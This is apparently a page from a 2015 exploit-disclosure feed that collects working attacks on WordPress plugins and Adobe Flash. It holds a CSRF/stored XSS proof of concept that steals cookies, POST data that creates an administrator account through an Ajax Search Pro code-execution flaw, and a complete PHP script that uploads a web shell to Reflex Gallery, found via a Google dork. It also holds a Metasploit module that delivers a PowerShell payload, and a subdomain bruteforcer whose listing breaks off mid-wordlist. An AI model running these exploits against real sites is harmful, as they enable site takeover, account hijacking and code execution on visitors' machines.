CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
===============================================================================
 
 
Overview
========
 
* Title: Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/
* Severity: HIGH
* Version Affected: Version 3.4 and most likely prior versions
* Version Tested: Version 3.4
* version patched: 
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
* Latitude:
* Longitude:
* Map Width:
* Map Height:
* Map Zoom:
* And all Input Boxes
 
 
 
About Vulnerability
-------------------
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, for example by hijacking the admin's cookies. 
 
Vulnerability Class
===================     
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting       (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
1. Goto settings -> Google Map Travel
 
2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## into any of the vulnerable parameters mentioned above,
save the settings and see the XSS in action.
 
3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored.
 
 
The plugin does not use any nonces, so the same settings can be changed via a CSRF attack; the PoC code for that is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST">
      <!-- the payload is entity-encoded so the browser submits it verbatim in the "lat" field -->
      <input type="hidden" name="lat" value="&quot;&gt; &lt;script&gt;+-+-1-+-+alert(document.cookie)&lt;/script&gt;" />
      <input type="hidden" name="long" value="76.26730" />
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="map_width" value="500" />
      <input type="hidden" name="map_height" value="300" />
      <input type="hidden" name="zoom" value="7" />
      <input type="hidden" name="day_less_five_fare" value="llllll" />
      <input type="hidden" name="day_more_five_fare" value="1.5" />
      <input type="hidden" name="less_five_fare" value="3" />
      <input type="hidden" name="more_five_fare" value="2.5" />
      <input type="hidden" name="curr_format" value="$" />
      <input type="hidden" name="submit" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
[Image: csrf.jpeg, XSS PoC screenshot]
 
 
 
 
Mitigation 
==========
Update to version 4.0
 
Change Log
==========
https://wordpress.org/plugins/ab-google-map-travel/changelog/
 
Disclosure 
==========
07-March-2015 Reported to Developer
11-March-2015 Reported to Wordpress
11-March-2015 Acknowledgement from Developer
16-March-2015 Wordpress reviewed and published the updated plugin.
16-March-2015 Requested for CVE ID
 
 
Credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh@me.com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad


30 Mar 2015

WordPress Ajax Search Pro Remote Code Execution

------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------
 
[-] Plugin Link:
 
http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410
 
also affected:
    https://wordpress.org/plugins/ajax-search-lite/
    https://wordpress.org/plugins/related-posts-lite/
 
[-] Vulnerability Description:
 
This vulnerability allows any registered user to execute arbitrary PHP functions.
Vulnerable code:
 
add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
    function wpdreams_ajaxinputcallback() {
        $param = $_POST;
        echo call_user_func($_POST['wpdreams_callback'], $param);
        exit;
    }
}
 
This lets any registered user call any function by name, with the first
parameter set to the $_POST array.
WordPress core provides functions that accept an array as their first
parameter; wp_insert_user() is one of them, and since the array it takes
includes a "role" key, it can be used to insert a new administrator.
 
[-] Proof of Concept:
 
this will register an administrator with username "xADMIN" and password
"xPASS"
 
url:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
post data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
 
[-] Fix:
 
Updated to the latest version.
 
[-] Timeline:
 
09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure
 
[-] References:
http://research.evex.pw/?vuln=9 <http://research.evex.pw/?vuln=8>
 
@Evex_1337


21 Mar 2015

WordPress Reflex Gallery 3.1.3 Shell Upload

<?php
 
/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TYPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (latest)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369
 
--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type = "file" name = "qqfile"><br>
  <input type = "submit" name = "Submit" value = "Pwn!">
  </form >
 
--------------------------------------------------------------------------------
 
  # AUTHOR:        Cleiton Pinheiro / Nick: googleINURL
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin   http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl/
  # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 */
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
 
function __plus() {
 
    ob_flush();
    flush();
}
 
function __request($params) {

    $objcurl = curl_init();
    // the plugin's FileUploader endpoint stores whatever it receives under
    // wp-content/uploads/<Year>/<Month>/ using the query-string values
    curl_setopt($objcurl, CURLOPT_URL,
        "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    // multipart upload in the form field the uploader expects ("qqfile");
    // CURLFile exists from PHP 5.5, "@path" is the legacy syntax for older PHP
    $upload = class_exists('CURLFile') ? new CURLFile($params['file']) : "@{$params['file']}";
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => $upload));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    $info['corpo'] = curl_exec($objcurl);     // raw response, headers included
    $info['server'] = curl_getinfo($objcurl); // transfer info is an array, keep it one
    curl_close($objcurl);
    __plus();
    return $info;
}

echo "[+]  Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n";
if (!isset($argv[1])) {
    exit("\n0x[ERROR] DEFINE TARGET!\n");
}
if (!isset($argv[2])) {
    exit("\n0x[ERROR] DEFINE FILE SHELL!\n");
}
$params = array(
    'file' => $argv[2],
    'host' => strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}",
);
__request($params);
// the uploaded file keeps its name, so it is reachable directly in the date folder
$_s = "{$params['host']}/wp-content/uploads/2015/03/" . basename($params['file']);
$_h = get_headers($_s, 1);
if ($_h === false) {
    exit("\n" . date("H:i:s") . " [INFO][COD]:: [-] NOT VULL (no response from target)\n");
}
foreach ($_h as $key => $value) {
    // repeated headers come back as arrays when get_headers() is called with format 1
    $value = is_array($value) ? implode(' | ', $value) : $value;
    echo date("H:i:s") . " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200'));
print "\n" . date("H:i:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL');
if (!empty($_x)) {
    file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND);
    print "\n" . date("H:i:s") . " [INFO][SHELL]:: [+] {$_s}\n";
} else {
    print "\n" . date("H:i:s") . " [INFO][SHELL]:: [-] ERROR!\n";
}


18Mar/150

Adobe Flash Player PCRE Regex Logic Error

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  CLASSID =  'd27cdb6e-ae6d-11cf-96b8-444553540000'
 
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player PCRE Regex Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
        in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
        a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mark Brand', # Found vuln
          'sinn3r'      # MSF
        ],
      'References'     =>
        [
          [ 'CVE', '2015-0318' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ],
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ]
        ],
      'Payload'        =>
        {
          'Space' => 1024,
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'Retries' => true
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :clsid   => "{#{CLASSID}}",
          :method  => "LoadMovie",
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          # Other versions are vulnerable but .235 is the one that works for me pretty well
          # So we're gonna limit to this one for now. More validation needed in the future.
          :flash   => lambda { |ver| ver == '16.0.0.235' }
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 25 2014",
      'DefaultTarget'  => 0))
  end
 
  def exploit
    # Please see data/exploits/CVE-2015-0318/ for source,
    # that's where the actual exploit is
    @swf = create_swf
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = get_profile(tag)
    profile[:tried] = false unless profile.nil? # to allow request the swf
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" )
    swf = ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
 
end


18Mar/150

DNS Spider Multithreaded Bruteforcer 0.6
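The header of the script that follows describes the tool's two candidate sources (a wordlist and/or character permutation) and lists as a TODO "attack while mutating", i.e. not building the whole permutation list up front. The block below is an added example, not part of dnsspider, showing the generator form of that candidate stream together with a wildcard-DNS check that the tool's "diffound" list hints at but does not perform: a zone with a wildcard record answers every label, so every candidate would be reported as found. The resolver is a constructed fake zone so the example runs offline; for real queries pass a function that wraps dnspython's resolver.

```python
"""Lazy candidate generation for subdomain brute force, with a wildcard check.
Added example, not part of dnsspider; the resolver below is a constructed fake
zone so it runs offline (swap in a dnspython-backed function for real queries)."""
import itertools
import random
import string


def candidates(domain, charset, maxchars, prefix="", postfix="", wordlist=()):
    """Yield fully qualified names one at a time: the wordlist first, then
    every prefix+permutation+postfix label of length 1..maxchars. Nothing is
    materialised, so a large -m over [a-z0-9] never builds the whole list."""
    for word in wordlist:
        yield "%s.%s" % (word, domain)
    for length in range(1, maxchars + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "%s%s%s.%s" % (prefix, "".join(combo), postfix, domain)


def detect_wildcard(domain, resolve, probes=3):
    """Resolve a few random labels that should not exist; if they all resolve
    to the same address set, the zone has a wildcard and that set is noise."""
    seen = set()
    for _ in range(probes):
        label = "".join(random.choice(string.ascii_lowercase) for _ in range(12))
        answers = frozenset(resolve("%s.%s" % (label, domain)))
        if not answers:
            return frozenset()
        seen.add(answers)
    return seen.pop() if len(seen) == 1 else frozenset()


def bruteforce(domain, resolve, **kwargs):
    """Return {name: addresses} for names that resolve, minus wildcard hits.
    kwargs are passed straight to candidates() (charset, maxchars, prefix, ...)."""
    wildcard = detect_wildcard(domain, resolve)
    found = {}
    for name in candidates(domain, **kwargs):
        addrs = frozenset(resolve(name))
        if addrs and addrs != wildcard:
            found[name] = sorted(addrs)
    return found


# Constructed zone: two real hosts plus a wildcard that answers for anything else.
FAKE_ZONE = {"www.example.test": ["192.0.2.10"], "ns1.example.test": ["192.0.2.53"]}
WILDCARD_ADDR = ["192.0.2.99"]


def fake_resolve(name):
    """Stand-in for a real lookup: returns the address list for a name."""
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    return WILDCARD_ADDR if name.endswith(".example.test") else []


if __name__ == "__main__":
    hits = bruteforce("example.test", fake_resolve, charset=string.digits,
                      maxchars=1, prefix="ns", wordlist=["www", "mail"])
    for name, addrs in sorted(hits.items()):
        print(name, addrs)
```

With the fake zone, "mail.example.test" resolves but only to the wildcard address, so it is dropped; "www" and "ns1" survive. A host that legitimately shares the wildcard address is the one case this filter hides, which is why the probe result should be printed alongside the findings rather than silently applied.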

#!/usr/bin/env python2
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# dnsspider.py - multithreaded subdomain bruteforcer                           #
#                                                                              #
# DATE                                                                         #
# 08/16/2012                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# A very fast multithreaded bruteforcer of subdomains that leverages a         #
# wordlist and/or character permutation.                                       #
#                                                                              #
# AUTHOR                                                                       #
# noptrix - http://www.nullsecurity.net/                                       #
#                                                                              #
# NOTES:                                                                       #
# quick'n'dirty code                                                           #
#                                                                              #
# TODO:                                                                        #
# - attack while mutating -> don't generate whole list when using -t 1         #
#                                                                              #
# CHANGELOG:                                                                   #
# v0.6                                                                         #
# - upgraded default wordlist                                                  #
# - replaced optionparser with argparse                                        #
# - add version output option                                                  #
# - fixed typo                                                                 #
#                                                                              #
# v0.5                                                                         #
# - fixed extracted ip addresses from rrset answers                            #
# - renamed file (removed version string)                                      #
# - removed trailing whitespaces                                               #
# - removed color output                                                       #
# - changed banner                                                             #
#                                                                              #
# v0.4                                                                         #
# - fixed a bug for returned list                                              #
# - added postfix option                                                       #
# - upgraded wordlist[]                                                        #
# - colorised output                                                           #
# - changed error messages                                                     #
#                                                                              #
# v0.3:                                                                        #
# - added verbose/quiet mode - default is quiet now                            #
# - fixed try/catch for domainnames                                            #
# - fixed some tab width (i normally use <= 80 chars per line)                 #
#                                                                              #
# v0.2:                                                                        #
# - append DNS and IP output to found list                                     #
# - added diffound list for subdomains resolved to different addresses         #
# - get right ip address from current used iface to avoid socket problems      #
# - fixed socket exception syntax and output                                   #
# - added usage note for fixed port and multithreaded socket exception         #
#                                                                              #
# v0.1:                                                                        #
# - initial release                                                            #
################################################################################
 
 
import sys
import time
import string
import itertools
import socket
import threading
import re
import argparse
try:
    import dns.message
    import dns.query
except ImportError:
    print("[-] ERROR: you need 'dnspython' package")
    sys.exit()
 
 
BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--'
USAGE = '\n\n' \
        '  dnsspider.py -t <arg> -a <arg> [options]'
VERSION = 'v0.6'
 
defaults = {}
hostnames = []
prefix = ''
postfix = ''
found = []
diffound = []
chars = string.ascii_lowercase
digits = string.digits
 
# default wordlist
wordlist = [
'0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17',
'18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI', 'a',
'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac', 'academico',
'acceso', 'access', 'accounting', 'accounts', 'acid', 'activestat', 'ad',
'adam', 'adkit', 'adm', 'admin', 'administracion', 'administrador',
'administrator', 'administrators', 'admins', 'ads', 'adserver', 'adsl', 'ae',
'af', 'affiliate', 'affiliates', 'afiliados', 'ag', 'agenda', 'agent', 'ai',
'aix', 'ajax', 'ak', 'akamai', 'al', 'alabama', 'alaska', 'albuquerque',
'alerts', 'alpha', 'alterwind', 'am', 'amarillo', 'americas', 'an', 'anaheim',
'analyzer', 'announce', 'announcements', 'antivirus', 'ao', 'ap', 'apache',
'apollo', 'app', 'app01', 'app1', 'apple', 'application', 'applications',
'apps', 'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona',
'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena',
'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto',
'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns', 'b01',
'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup', 'backups',
'baker', 'bakersfield', 'balance', 'balancer', 'baltimore', 'banking',
'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea', 'beta', 'bf', 'bg',
'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj', 'black', 'blackberry',
'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo', 'board', 'bob', 'bof',
'boise', 'bolsa', 'border', 'boston', 'boulder', 'boy', 'br', 'bravo', 'brazil',
'britian', 'broadcast', 'broker', 'bronze', 'brown', 'bs', 'bsd', 'bsd0',
'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla',
'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by',
'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call',
'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd',
'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv',
'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie',
'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi',
'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class',
'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack',
'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm',
'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus',
'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate',
'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference',
'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console',
'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact',
'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01',
'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos',
'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css',
'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer',
'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database',
'database01', 'database02', 'database1', 'database2', 'databases', 'datastore',
'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de',
'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta',
'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des',
'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev',
'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 'developers',
'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup',
'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery',
'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer',
'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2',
'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document',
'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino',
'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal',
'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0',
'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi',
'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email',
'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1',
'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es',
'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events',
'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external',
'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback',
'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore',
'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk',
'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro',
'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox',
'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01',
'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk',
'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1',
'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias',
'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper',
'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia',
'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn',
'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group',
'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h',
'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry',
'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home',
'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4',
'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov',
'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias',
'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois',
'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01',
'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india',
'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int',
'interface', 'intern', 'internal', 'international', 'internet', 'intl',
'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6',
'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd',
'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv',
'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber',
'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp',
'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas',
'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg',
'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe',
'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory',
'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc',
'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link',
'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists',
'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local',
'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile',
'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london',
'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke',
'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3',
'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer',
'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom',
'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage',
'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps',
'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland',
'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 'mdaemon', 'me', 'media',
'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger',
'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike',
'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi',
'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor',
'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3',
'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange',
'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia',
'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1',
'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville',
'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp',
'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen',
'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey',
'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups',
'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj',
'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora',
'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias',
'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1',
'ns2', 'ns3', 'ns4', 'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver',
'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office',
'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha',
'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview',
'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or',
'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar',
'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01',
'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages',
'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch',
'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101',
'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2',
'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft',
'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix',
